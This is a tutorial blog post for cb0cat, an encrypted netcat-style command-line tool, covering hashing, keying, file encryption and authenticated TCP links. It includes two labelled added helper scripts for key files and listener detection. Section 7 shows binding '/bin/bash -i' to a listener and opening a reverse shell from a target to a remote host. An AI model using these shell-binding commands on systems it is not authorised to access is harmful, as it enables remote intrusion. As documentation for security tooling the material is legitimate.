cb0cat

I’m happy to present a guest post by my friend Markku-Juhani O. Saarinen about cb0cat, a new tool he’s releasing, and a project sponsored by Kudelski Security. cb0cat will be useful to pentesters, cryptographers, and any user that needs an easy-to-use command-line tool to perform basic encrypted communications.

This post is a tutorial on the use of cb0cat, and is reproduced on the cb0cat website.



1. Introduction and License

This is a quick tutorial to the cb0cat multi-use cryptographic tool, which can be used to hash, encrypt, and decrypt files and to establish secure communication links over TCP. cb0cat has been designed to be self-contained, portable, and extremely lightweight (currently only about 1500 lines).

cb0cat is based on the CBEAM cryptographic permutation and BLINKER sponge mode of operation presented at Cryptography Track, RSA Conference USA 2014 (CT-RSA 2014). The two papers are:

M.-J. O. Saarinen: CBEAM: Efficient Authenticated Encryption from Feebly One-Way Phi Functions

M.-J. O. Saarinen: Beyond Modes: Building a Secure Record Protocol from a Cryptographic Sponge Permutation

The protocol can run on arbitrary network interfaces in addition to TCP. We have implemented it even on MSP430 ultra-low power embedded microcontroller chips.

Special thanks to Kudelski Security for sponsoring cb0cat. This software and documentation is released under a BSD-style license. There is absolutely no warranty or support provided.


Copyright © 2013, Markku-Juhani O. Saarinen <[email protected]> All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither Markku-Juhani O. Saarinen’s name nor Kudelski Security, CBEAM, BLINKER, or the names of any other affiliated Companies, Institutions, Designs or Products may be used to endorse or promote products derived from this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL MARKKU-JUHANI O. SAARINEN BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

While Kudelski Security is acting as a sponsor of this initiative, M. Markku-Juhani O. Saarinen is the sole and exclusive owner of the copyright in this software at the exclusion of Kudelski Security. Kudelski Security has no responsibility whatsoever in such initiative and/or software and IN NO EVENT SHALL KUDELSKI SECURITY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION).

2. Download, Compile, and Test

Versions of cb0cat are available from the distribution directory https://www.cblnk.com/cb0cat/dist. Versions are numbered by date: cb0cat-yyyymmddhhmmss.tgz.

This version is based on “revision zero” of CBEAM, called CBEAMr0. Note that after 15 March 2014 versions will be based on official first round CAESAR version CBEAMr1, and the name of this project will change correspondingly.

On any modern Linux platform you should be able to extract and compile the system with:

$ tar xfvz cb0cat-yyyymmddhhmmss.tgz
$ cd cb0cat
$ make

This will create the “cb0cat” executable which can be copied to a suitable location. If you’re compiling on a new platform you may quickly test the integrity of the CBEAM transform with:

$ ./cb0cat -t
Compiled on Dec 13 2013 01:52:56
cbeam_selftest() == 0

Zero implies success. There’s also some online help available:

$ ./cb0cat -h
CBEAMr0 Cryptographic Tool.
(c) 2013 Markku-Juhani O. Saarinen see LICENSE.

cb0cat [OPTION].. [FILE]..
-h This help text
-t Quick self-test and version information

Shared secret key (use twice to verify):
-q Prompt for key
-f Use file as a key
-k Specify key on command line

Files:
-s Hash stdin or files (default, optionally keyed)
-e Encrypt stdin or files (add .cb0 suffix)
-d Decrypt stdin or files (must have .cb0 suffix)

Communication via Blinker protocol:
-p Specify TCP port (standard 3248)
-c Connect to a specific host (client)
-l Listen to incoming connection (server)

3. Hashing

When invoked with the “-s” flag, cb0cat behaves in a similar fashion to “md5sum” and “sha1sum” tools. If there are no additional parameters, data is simply taken in from stdin and hashed to the output.

$ echo "Hello" | ./cb0cat -s
9b25ceeedf9f787fb3a6b12a6b3b1e07fb8e382d69a5c777 -

You may also invoke it directly on files:

$ ./cb0cat -s *.h
60183ed73f8707f2230dbdc25ab4b32997ef4ce2a0bd6845 cbeam.h
c33fa04a0cac11610e014ed5913acc9e6841b77be9a6e000 cblnk.h
985d95e1773d53a8a2d841bf477b8991fd410b858766c2d9 comms.h

Hash outputs are always 192 bits for cb0cat.

4. Keying

All operations except hashing require a single symmetric shared key, which is used for both confidentiality and integrity protection. You can also specify a key for hashing; the same key will be required to verify the hash.

There are three ways to supply keys. You can use any of them, in any order, as many times as you wish, but all of the supplied keys must be equal!

-q

Prompt for a password. Invoke twice with -qq and you will be asked to verify the given password. This is recommended for encryption operations.

-k key

Takes the key as an argument on the command line.

-f path

Reads the key from the file given as the argument. The entire contents of the file will be used in binary form, so be careful about line feeds. You may also use special files such as pipes or /dev/tty.

Example. This keyed hashing operation uses all three key input methods:

$ echo "Hello" | ./cb0cat -q -k "" -f /dev/null -q -s
Secret key:
Verify key:
1674d303c1c8e49c37b58267f1a126d038a323ad36c7bcf8 -

You will first be prompted to enter a secret key. Because -k and -f both supply an empty key, the operation will fail unless you just press Enter at the prompt. You will then be prompted again to verify the empty key.
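The line-feed caveat for -f is the usual cause of "keys must be equal" failures: a file written with echo carries a trailing newline that the same text given via -k does not. A key passed with -k is also typically visible to other local users in the process list, so a key file or -q is the safer habit. The helpers below are an added example, not part of cb0cat; the function names are hypothetical.

```shell
#!/bin/sh
# Added example (not cb0cat code): create and sanity-check a key file for "-f".
# cb0cat uses the whole file as binary key material, so a trailing newline
# makes the key differ from the same text supplied with -k or -q.

# write_keyfile PATH KEYTEXT: store KEYTEXT with no trailing newline.
# A newly created file gets mode 0600 because of the umask in the subshell.
write_keyfile() {
    ( umask 077 && printf '%s' "$2" > "$1" )
}

# new_random_keyfile PATH: 32 random bytes written as 64 hex characters.
new_random_keyfile() {
    key=$(od -An -N32 -tx1 /dev/urandom | tr -d ' \n')
    write_keyfile "$1" "$key"
}

# keyfile_problems PATH: print one line per problem; print nothing if clean.
keyfile_problems() {
    [ -s "$1" ] || { echo "empty or missing"; return 0; }
    # Hex value of the last byte of the file.
    last=$(tail -c 1 "$1" | od -An -tx1 | tr -d ' \n')
    case "$last" in
        0a) echo "ends with LF" ;;
        0d) echo "ends with CR" ;;
    esac
    # Characters 5-10 of the ls mode string are the group and other bits.
    mode=$(ls -l "$1" | cut -c5-10)
    [ "$mode" = "------" ] || echo "readable by group or others"
}

# Typical use (the path is a placeholder):
#   new_random_keyfile "$HOME/.cb0key"
#   keyfile_problems "$HOME/.cb0key"
#   ./cb0cat -f "$HOME/.cb0key" -e somefile
```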

5. Encryption and Decryption

When invoked without file names, the operation is from standard input to standard output.

-e

Encrypt a stream or files.

-d

Decrypt a stream or files.

The “.cb0” suffix is added to encrypted files and is expected on files to be decrypted.

cb0cat is capable of encrypting and decrypting streams of arbitrary length as the operation is performed on individually protected chunks. Also there is strong integrity protection against truncation and other attacks, which leads to some message expansion. No other attributes except the contents of the file are protected; you should use tools such as “tar” to store those attributes.

To encrypt the binary executable itself:

$ ./cb0cat -e -k testkey cb0cat
$ ls -l cb0cat*
-rwxrwxr-x 1 mjos mjos 32160 Dec 13 02:42 cb0cat
-rw-rw-r-- 1 mjos mjos 32224 Dec 13 02:42 cb0cat.cb0

We will decrypt the ciphertext file to cb0cat.2 using streams:

$ ./cb0cat -d -k testkey < cb0cat.cb0 > cb0cat.2

We can now verify that the two plaintext files are equivalent by hashing them:

$ ./cb0cat -s cb0cat cb0cat.2
7462d6bc9531b0dce97edb583e7c17115c48ce30760bca54 cb0cat
7462d6bc9531b0dce97edb583e7c17115c48ce30760bca54 cb0cat.2

Your compilation of the binary will have a different hash.

6. Networking and File Transfer

The networking side of cb0cat has been modeled after the “netcat” tool, with the difference that cb0cat uses a rather elaborate (yet fast) randomized mutual authentication scheme to establish session keys for confidentiality and integrity protection.

-p port

Specify a TCP port. By default port 3248 (hex 0xCB0) is used.

-l

Listen mode. Wait for an incoming connection at the specified port, perform handshake and authentication, and then direct standard input and output through the established cryptographic channel.

-c hostname

Connect to the Internet host given as argument (e.g. localhost) and perform handshake and authentication. Standard input and output are forwarded to the encrypted channel.

The same keying options are available as for file encryption and decryption.

In its most basic form we can have a little chat over the channel. On the first terminal, set up a listener with the shared secret “password” on the standard port 3248.

bobby$ ./cb0cat -k password -l

On second terminal, we can connect to the listener at bobby, port 3248:

alice$ ./cb0cat -q -c bobby
Secret key:

You must enter the correct “password” at the prompt for the authentication to succeed. After this you may write lines of text in either terminal and they will pop up in the other (the standard streams are line buffered by default).

We may also transmit files using streams. This command issued on bobby will wait for connection at port 12345:

bobby$ ./cb0cat -k keykey -p 12345 -l > dump.dat

After executing the command

alice$ ./cb0cat -k keykey -p 12345 -c bobby < dump.dat

the file “dump.dat” will be copied to the destination.

7. Binding a Shell or Command

A simple shell can be bound at either end of the connection by specifying the shell (or any other interactive command) as a single argument. You must enclose the command and its arguments in quotation marks so that they are not confused with arguments to cb0cat.

This starts a “poor man’s sshd” for a single incoming session at port 12345 with shared secret “keu”:

bobby$ ./cb0cat -p 12345 -k keu -l "/bin/bash -i"

To connect:

alice$ ./cb0cat -p 12345 -k keu -c bobby

Upon connection one may now use the shell at “bobby”. Since i/o is line buffered and there is no tty handshake, the interaction is somewhat limited.

A reverse bind shell is just as easy; we first start the listener without arguments:

bobby$ ./cb0cat -p 12345 -k keu -l

And then invoke on the target:

alice$ ./cb0cat -p 12345 -k keu -c bobby "/bin/bash -i"

And the target’s shell will pop up at bobby.
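For administrators who want to know whether such a listener is running on a host, the following added example (not part of cb0cat) reads the Linux /proc/net/tcp table and reports sockets in LISTEN state on a given port. That table stores ports in hex, so the default 3248 appears as 0CB0. It only finds a listener on the port you ask about, since -p can move it; the function names and the sample table are constructed for illustration.

```shell
#!/bin/sh
# Added example (not cb0cat code): find TCP listeners on a port by parsing
# /proc/net/tcp (IPv4 only in this sketch).

# Constructed sample of /proc/net/tcp, trimmed to the columns used here.
SAMPLE_TABLE='  sl  local_address rem_address   st
   0: 00000000:0016 00000000:0000 0A
   1: 0100007F:0CB0 00000000:0000 0A
   2: 0A00020F:0CB0 0A000210:D431 01
   3: 00000000:3039 00000000:0000 0A'

# hex_to_ip HEX: 0100007F -> 127.0.0.1
# (the kernel prints the address bytes reversed on little-endian hosts).
hex_to_ip() {
    printf '%d.%d.%d.%d' \
        "0x$(echo "$1" | cut -c7-8)" "0x$(echo "$1" | cut -c5-6)" \
        "0x$(echo "$1" | cut -c3-4)" "0x$(echo "$1" | cut -c1-2)"
}

# listeners_on PORT [TABLE_FILE]
# Prints the local address of every socket in LISTEN state (st == 0A)
# bound to PORT. Reads TABLE_FILE, or /proc/net/tcp when omitted.
listeners_on() {
    want=$(printf '%04X' "$1")
    awk -v want="$want" '
        NR > 1 {
            split($2, la, ":")
            if (toupper(la[2]) == want && toupper($4) == "0A") print la[1]
        }' "${2:-/proc/net/tcp}" |
    while read -r hex; do
        hex_to_ip "$hex"
        echo
    done
}

# Typical use on a live host:
#   listeners_on 3248
```

An established connection on the same port (state 01 in the sample) is deliberately not reported; only sockets waiting for an incoming connection are.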
